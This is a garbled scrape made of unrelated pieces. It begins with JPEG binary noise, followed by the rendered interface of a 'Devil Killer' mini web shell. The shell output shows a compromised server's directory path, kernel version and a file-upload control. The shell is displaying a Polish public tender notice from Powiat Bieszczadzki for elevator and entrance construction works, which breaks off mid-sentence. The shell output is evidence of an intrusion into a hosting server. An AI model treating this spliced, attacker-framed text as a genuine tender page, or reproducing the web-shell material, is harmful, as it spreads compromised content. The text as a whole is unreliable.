JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230227/0011267601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Realizacja programów „Dostępny Samorząd - granty” oraz „Program wyrównywania różnic pomiędzy regionami III” w Powiecie Bieszczadzkim. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Bieszczadzki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370439953</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bełska</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ustrzyki Dolne</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">134712500</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">134611073</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@bieszczadzki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bieszczadzki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Realizacja programów „Dostępny Samorząd - granty” oraz „Program wyrównywania różnic pomiędzy regionami III” w Powiecie Bieszczadzkim. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-628cde9c-b6ad-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00112676</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00072775/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Realizacja programów „Dostępny Samorząd - granty” oraz „Program wyrównywania różnic pomiędzy regionami III”, w Powiecie Bieszczadzkim.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> programów „Dostępny Samorząd - granty” oraz „Program wyrównywania różnic pomiędzy regionami III”, </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/bieszczadzki <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/bieszczadzki</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert oraz oświadczeń, odbywa się<br/>przy użyciu środków komunikacji elektronicznej zapewnionych przez system zapewniający obsługę procesu udzielania zamówień<br/>publicznych za pośrednictwem środków komunikacji elektronicznej, zwany dalej Systemem.<br/>3. System jest dostępny pod adresem: https://portal.smartpzp.pl/bieszczadzki<br/>4. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta w Systemie, ani logowania<br/>do Systemu.<br/>5. Za pośrednictwem posiadanego w Systemie konta Użytkownika Zewnętrznego odbywa się komunikacja Wykonawcy z<br/>Zamawiającym w postępowaniu, w szczególności: przekazywanie dokumentów, oświadczeń, informacji, pytań, wniosków w ramach<br/>postępowania.<br/>6. Za pośrednictwem posiadanego w Systemie konta Jednostki Zamawiającej oraz kont jej Użytkowników Wewnętrznych odbywa się<br/>komunikacja Zamawiającego z Wykonawcą w postępowaniu, w szczególności: przekazywanie wezwań i zawiadomień, informacji,<br/>odpowiedzi na pytania.<br/>7. Zadawanie pytań przez Wykonawców odbywa się w zakładce „Pytania do postępowania”. Po otwarciu ofert, komunikacja między<br/>Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie<br/>elektronicznej (czyli opatrzoną podpisem kwalifikowanym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym za pośrednictwem Platformy, w zakładce „Korespondencja”, która dla Wykonawcy jest widoczna w Zakładce „Oferty”, po<br/>zaznaczeniu numeru złożonej oferty. Za datę wpływu oświadczeń, wniosków, zaświadczeń oraz informacji przyjmuje się datę<br/>zapisania plików na serwerze. Aktualna data i godzina, zsynchronizowane z Głównym Urzędem Miar, wyświetlane są w prawym<br/>górnym rogu Systemu.<br/>Pozostałe zapisy znajdują się w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679, zamawiający informuje, że: <br/>1) administratorem danych osobowych osób fizycznych jest Starosta Bieszczadzki <br/>2) Zamawiający wyznaczył Inspektora Ochrony Danych, z którym można się skontaktować pocztą elektroniczną na adres<br/>iod@bieszczadzki.pl<br/>3) dane osobowe osób fizycznych przetwarzane będą na podstawie art. 6 ust. 1 lit. c rozporządzenia 2016/679 w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego:<br/>Nadzór inwestorski dla zadań inwestycyjnych Powiatu Bieszczadzkiego.<br/>Część 1. Rafineria kultur – rewitalizacja zabytkowego budynku Rafinerii FANTO w Ustrzykach Dolnych na potrzeby Bieszczadzkiego<br/>Centrum Dziedzictwa Kulturowego. ETAP II<br/>Część. 2. Remont budynku byłej strażnicy straży granicznej z pomieszczeniami zaadaptowanymi na izby krótkotrwałego<br/>przetrzymywania w Ustrzykach Dolnych<br/>– Oznaczenie sprawy: IZP.272.2.2023<br/>4) w odniesieniu do danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do<br/>art. 22 rozporządzenia 2016/679;<br/>5) osoba fizyczna posiada:<br/>a) na podstawie art. 15 rozporządzenia 2016/679 prawo dostępu do danych osobowych jej dotyczących;<br/>b) na podstawie art. 16 rozporządzenia 2016/679 prawo do sprostowania swoich danych osobowych;<br/>c) na podstawie art. 18 rozporządzenia 2016/679 prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679; <br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy osoba fizyczna uzna, że przetwarzanie danych<br/>osobowych jej dotyczących narusza przepisy rozporządzenia 2016/679;<br/>6) osobie fizycznej nie przysługuje:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e rozporządzenia 2016/679 prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 rozporządzenia 2016/679;<br/>c) na podstawie art. 21 rozporządzenia 2016/679 prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania danych osobowych osób fizycznych jest art. 6 ust. 1 lit. c rozporządzenia 2016/679. <br/>11. Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia wszystkich obowiązków<br/>formalno-prawnych związanych z udziałem w postępowaniu, w tym również obowiązków wynikających z rozporządzenia 2016/679,<br/>w szczególności obowiązek informacyjny przewidziany w art. 13 rozporządzenia 2016/679 względem osób fizycznych, których dane<br/>osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał. Obowiązek informacyjny wynikający z art. 13<br/>rozporządzenia 2016/679 nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już<br/>tymi informacjami (art. 13 ust. 4 rozporządzenia 2016/679).<br/>12. Wykonawca jest obowiązany wypełnić obowiązek informacyjny wynikający z art. 14 rozporządzenia 2016/679 względem osób<br/>fizycznych, których dane przekazuje zamawiającemu i których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej<br/>jedno z włączeń, o których mowa w art. 14 ust. 5 rozporządzenia 2016/679.<br/>13. W celu zapewnienia, że wykonawca wypełnił obowiązki informacyjne wynikające z rozporządzenia 2016/679 oraz ochrony<br/>prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z ubieganiem się wykonawcy o<br/>udzielenie zamówienia w postępowaniu, wykonawca składa w postępowaniu oświadczenie o wypełnieniu przez niego obowiązków<br/>informacyjnych przewidzianych w art. 13 lub art. 14 rozporządzenia 2016/679. Oświadczenie, o którym mowa w zdaniu pierwszym<br/>wykonawca składa w ofercie.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1<br/>rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>4. W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, spowoduje<br/>ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia<br/>zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o<br/>których mowa w art. 18 ust. 2 rozporządzenia 2016/679. <br/>5. Ograniczenia zasady jawności, o których mowa w ust. 3 i art. 18 ust. 3-6 Pzp, stosuje się odpowiednio. <br/>6. W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym<br/>mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, zamawiający może żądać od osoby występującej z żądaniem wskazania<br/>dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia. <br/>7. Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych<br/>osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu postępowania oraz jego<br/>załączników.<br/>8. W postępowaniu są przetwarzane dane osobowe podlegające ochronie zgodnie z przepisami ustawy z dnia 10 maja 2018 r. o<br/>ochronie danych osobowych (Dz.U. z 2019 r. poz. 1781) oraz rozporządzenia 2016/679. Dane te mogą dotyczyć w szczególności<br/>samego wykonawcy (osoby fizycznej prowadzącej działalność gospodarczą), jego pełnomocnika (osoby fizycznej), jak też informacji<br/>o osobach, które w swojej ofercie wykonawca przedkłada celem wykazania spełniania warunków udziału w postępowaniu, braku<br/>podstaw do wykluczenia z postępowania, jak i potwierdzenia wymogów zamawiającego dotyczących wykonania przedmiotu<br/>zamówienia.<br/>9. W postępowaniu i po zakończeniu postępowania do przetwarzania danych osobowych osób fizycznych stosuje się przepisy ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz.U. z 2019 r. poz. 1781) oraz rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.272.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1. Budowa szybu windowego wraz z wykonaniem dźwigu wewnętrznego <br/><br/>Wykonanie i montaż dźwigu platformowego o udźwigu 400 kg dla 4 kondygnacji w środkowej części budynku Bieszczadzkiego Zespół Placówek Szkolno- Wychowawczych usytuowanego przy ul. Witolda Gombrowicza 37, 38-700 Ustrzyki Dolne polega na dostosowaniu konstrukcji w/w budynku poprzez wykonanie:<br/>Fundamentu w postaci belek z betonu C20/25, zbrojonych stalą A-III(34GS), a także A-0. Belki oraz ich lokalizację oznaczono na rys. nr 5, nr 7 i 8 (Bw- 1; Bw-2) dokumentacji projektowej.<br/>Płyty podszybia zaprojektowanej jako płytę żelbetową z betonu C20/25, zbrojoną stalą A-III(34GS). Grubość płyty – 15cm. Płytę oraz jej lokalizację oznaczono na rys nr. 8 i nr 5 dokumentacji projektowej.<br/>Szybu windowego typowego samonośnego, wykonanego z profili aluminiowych. Konstrukcje szybu zaprojektowano jako oparte na płycie podszybia, mocowania pionowe szybu do ściany istniejącej i stropu według projektu typowego dostarczonego przez wykonawcę.<br/>Otworów w istniejących stropach budynku wykonanych z płyt kanałowych gr. 24cm. Przed wycięciem otworów zaprojektowano wzmocnienie stropu w postaci belek podporowych stalowych stanowiących podporę dla wyciętych płyt stropowych. Zaprojektowano belki wykonane z dwuteowników HEB 180 opartych na istniejących ścianach nośnych. <br/>Zamontowanie podnośnika pionowego w szybie o napędzie elektrycznym. Przygotowanie i przeprowadzenie procedur niezbędnych do wykonania badań inspektora Urzędu Dozoru Technicznego. Uzyskanie decyzji zezwalającej na eksploatację zgodnie z obowiązującymi przepisami.<br/>Zadanie przewiduje również zamurowania otworów w ścianach wewnętrznych oraz wykonania drzwi o wymiarach 90/205 o odporności ogniowej EL60 dla każdej kondygnacji budynku zgodnie z dokumentacją projektową.<br/><br/>OPZ dla tej części stanowią załączniki: <br/><br/>Numer załącznika	Nazwa załącznika<br/>1.1	Dokumentacja techniczna<br/>1.2	OPZ dla części I<br/>1.3	Wzór umowy <br/><br/>Zadanie sfinansowane w ramach: <br/><br/>1) Program „Dostępny samorząd – granty; <br/>2) Program wyrównywania różnic pomiędzy regionami III; <br/>3) Budżet Powiatu Bieszczadzkiego; <br/><br/>Wykonawca wyłoniony w drodze przetargu zobowiązany jest do: <br/><br/>1) urządzenia i zagospodarowanie placu i zaplecza budowy, <br/>2) zapewnienia we własnym zakresie zasilania w energię elektryczną oraz dostawę wody technologicznej i spożywczej, a także możliwość podgrzewania napojów i posiłków, <br/>3) utrzymania zaplecza budowy, <br/>4) przywrócenia terenu do stanu pierwotnego w miejscach nie przewidzianych pod roboty <br/>inwestycyjne a zajętych w trakcie robót, <br/>5) sporządzenia operatu kolaudacyjnego, który ma zawierać: umowy z ewentualnymi <br/>podwykonawcami i dalszymi podwykonawcami, protokół przekazania terenu budowy, <br/>protokoły odbioru robót, komplet atestów, certyfikatów i aprobat technicznych na <br/>wbudowane materiały budowlane, końcowy protokół odbioru, oświadczenie <br/>uprawnionego kierownika robót o wykonaniu zadania zgodnie z przepisami, <br/>powykonawczej inwentaryzacji geodezyjnej oraz wszystkie niezbędne dokumenty do <br/>przekazania obiektu do użytkowania,<br/>6) uwzględnienia w wykonywaniu robót zakresów zadań i kolizji występujących w pozostałych częściach zamówienia, <br/>Wykonawca wyłoniony w drodze przetargu zobowiązany jest do: <br/>7) Niepogorszenia stanu budynku oraz placu przy budynku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">42416100-6 - Windy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wynagrodzenie wykonawcy jest wynagrodzeniem ryczałtowym.<br/><br/>2. Sposób obliczenia ceny określa formularz oferty stanowiący Załącznik nr 8 do SWZ oraz kosztorysy pomocnicze składane dla poszczególnych części zamówienia.<br/><br/>XXV. Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert.<br/>Dla części 1,2,3<br/>1. Kryterium „Cena” w zł:<br/><br/>1) znaczenie kryterium - 60% (0,6);<br/>2) opis sposobu oceny ofert dla kryterium „Ceny”: <br/><br/>wzór obliczania liczby punktów: <br/><br/>C = (M / B) x 60,00<br/><br/>gdzie:<br/><br/>a) C - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty;<br/><br/>b) M - cena w ofercie z najniższą ceną;<br/>c) B - cena w ofercie ocenianej.<br/><br/>2. Kryterium „okres gwarancji”<br/><br/>1) znaczenie kryterium - 40% (0,4);<br/><br/>2) opis sposobu oceny ofert dla kryterium „okres gwarancji”: <br/><br/>wzór obliczania liczby punktów: <br/><br/>P = B / M x 40,00<br/><br/>gdzie:<br/><br/>D- liczba punktów w kryterium<br/>B – liczba miesiecy w ofercie badanej <br/>M- największa zaoferowana liczba pobytów z pośród złożonych ofert <br/><br/>Wykonawca podaje okres gwarancji w liczbach całkowitych oraz słownie w formularzu oferty stanowiącym załącznik nr 8 do SWZ. <br/><br/>Okres gwarancji nie może być krótszy niż 36 miesięcy oraz dłuższy niż 84 miesiące. <br/><br/>W przypadku podania przez wykonawcę w formularzu oferty okresu gwarancji dłuższego niż 84 miesiące:<br/><br/>a) do oceny ofert zostanie przyjęty okres gwarancji wynoszący 84 miesięcy,<br/>b) do umowy zostanie wpisany okres gwarancji podany w formularzu oferty.<br/><br/>W przypadku podania przez wykonawcę w formularzu oferty okresu gwarancji krótszego niż 36 miesięcy, oferta tego wykonawcy zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 Pzp („Zamawiający odrzuca ofertę, jeżeli jej treść jest niezgodna z warunkami zamówienia”).<br/><br/>Dla części 4<br/><br/>1. Kryterium „Cena” w zł:<br/><br/>1) znaczenie kryterium - 60% (0,6);<br/>2) opis sposobu oceny ofert dla kryterium „Ceny”: <br/><br/>wzór obliczania liczby punktów: <br/><br/>C = (M / B) x 60,00<br/><br/>gdzie:<br/><br/>a) C - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty;<br/><br/>b) M - cena w ofercie z najniższą ceną;<br/>c) B - cena w ofercie ocenianej.<br/><br/><br/>2. Kryterium „doświadczenie osób skierowanych do realizacji zamówienia”<br/><br/>1) znaczenie kryterium - 40% (0,4);<br/><br/>2) opis sposobu oceny ofert dla kryterium „doświadczenie osób skierowanych do realizacji zamówienia”: <br/><br/>udział w prowadzeniu 1 – 3 usług doradczych – 5 pkt <br/>udział w prowadzeniu 4 – 7 – usług doradczych – 15 pkt <br/>udział w prowadzeniu 8 – 10 – usług doradczych – 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2. Prace modernizacyjne strefy wejściowej w Bieszczadzkim Zespole Placówek Szkolno Wychowawczych. <br/><br/>Prace modernizacyjne strefy wejściowej<br/> <br/>Prace polegają m.in. na:<br/>-demontażu drzwi oraz wykuciu 